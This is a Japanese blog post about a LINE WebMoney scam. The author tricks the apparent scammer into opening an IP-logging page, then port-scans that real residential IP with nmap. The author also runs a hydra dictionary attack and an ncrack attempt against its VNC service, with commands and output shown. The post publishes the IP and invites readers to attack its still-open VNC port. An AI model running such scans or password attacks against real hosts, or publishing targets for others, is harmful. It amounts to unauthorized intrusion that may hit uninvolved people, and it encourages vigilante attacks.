LINEのWebmoney詐欺師のIPアドレスを割り出してみた

by · 2014/7/6 日曜日

概要

知り合いのLINEアカウントがクラックされて、Webmoneyを要求してきたので、犯人のIPアドレスを割り出して見ました。

とりあえずは、Webmoneyを買いたい人を装って、ノリノリでリプライしていきます。

相手は、中国人らしく、天安門事件と返信すると退席するという事例があるらしいので、IPアドレスを割り出したら、天安門事件とリプライしようと思ってました。
10003830 511691137808 7870701808275815748 o 281x500 LINEのWebmoney詐欺師のIPアドレスを割り出してみた

会話

LINE電話したら、相手が操作を間違って取ることを願って、かけてみましたが、応答ありませんでした。(´・ω・`)
10368391 511691227628 6793328312200426418 n 281x500 LINEのWebmoney詐欺師のIPアドレスを割り出してみた

Webmoneyを買ったふりをして、写メをWebにアップロードしたと報告します。もちろん、それは嘘でIPアドレスを抜くためのWebページです。しかし、なかなか開いてくれません。
10489672 511691382318 8847995553511807141 n LINEのWebmoney詐欺師のIPアドレスを割り出してみた

まだ開きません。
1932694 511691447188 2162515012321360227 o 519x1024 LINEのWebmoney詐欺師のIPアドレスを割り出してみた

やっと開きました!しかし、開いてくれた途端、退出されました。
LINEの運営がアカウントを無効化したためです。ぎりぎり間に合って良かった!
10430478 511691586908 3830463912418740578 n LINEのWebmoney詐欺師のIPアドレスを割り出してみた

最後の〆のために作った、天安門のページがお蔵入りになってしまって残念です。
Screenshot 7 6 14 0 38 150x62 LINEのWebmoney詐欺師のIPアドレスを割り出してみた

IPを調べる

こちらが、犯人がアクセスしたアクセスログ。
IPアドレスは126.7.173.196
Windows7で、Chromeを使っている模様。
(HTTPヘッダも取っておけば良かったなぁと反省)

126.7.173.196 - - [02/Jul/2014:22:43:48 +0900] "GET /static/webmoney.html HTTP/1.1" 200 272 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1"

プロバイダはYahoo BBの様子。

% host 126.7.173.196
196.173.7.126.in-addr.arpa domain name pointer softbank126007173196.bbtec.net.

軽くポートスキャンしてみると、VNCのポートが空いてる

% nmap 126.7.173.196

Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-02 22:50 JST
Nmap scan report for softbank126007173196.bbtec.net (126.7.173.196)
Host is up (0.065s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
135/tcp open msrpc
1025/tcp open NFS-or-IIS
1723/tcp open pptp
5800/tcp open vnc-http
5900/tcp open vnc

Nmap done: 1 IP address (1 host up) scanned in 5.36 seconds

そして、VNCのパスワードをクラックするためにncrackをしばらく動かしていたんだけど、どうやらVNCの時はちゃんと動いてくれない模様。

次に、hydra使って、有名どころのパスワードを一通り試してみましたが、一致せず。。。。

% hydra -t 1 -P john.txt 126.7.173.196 vnc
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-07-05 16:20:39
[DATA] 1 task, 1 server, 3107 login tries (l:1/p:3107), ~3107 tries per task
[DATA] attacking service vnc on port 5900
[ERROR] VNC server connection failed
[ERROR] VNC server connection failed
[ERROR] VNC server connection failed
[ERROR] VNC server connection failed
....
[ERROR] VNC server connection failed
[ERROR] VNC server connection failed
[ERROR] Not a VNC protocol or service shutdown: (null)
[ERROR] Too many connect errors to target, disabling vnc://126.7.173.196:5900
0 of 1 target completed, 0 valid passwords found
[ERROR] 1 target did not resolve or could not be connected
Hydra (http://www.thc.org/thc-hydra) finished at 2014-07-05 16:38:16

BruteForceかけるのもだるいので、これにておわり。

まだVNCのポートは空いているので、煮るなり焼くなりお好きにどうぞ。

hatena LINEのWebmoney詐欺師のIPアドレスを割り出してみた
LINEのWebmoney詐欺師のIPアドレスを割り出してみた
article clipper LINEのWebmoney詐欺師のIPアドレスを割り出してみた
btn logo 16 LINEのWebmoney詐欺師のIPアドレスを割り出してみた
Check

Tags:

Yuki Matsukura

Please feel free to contact me via e-mail, twitter and facebook!

You may also like...

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です

次のHTML タグと属性が使えます: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong> <img localsrc="" alt="">

Follow:

アーカイブ

More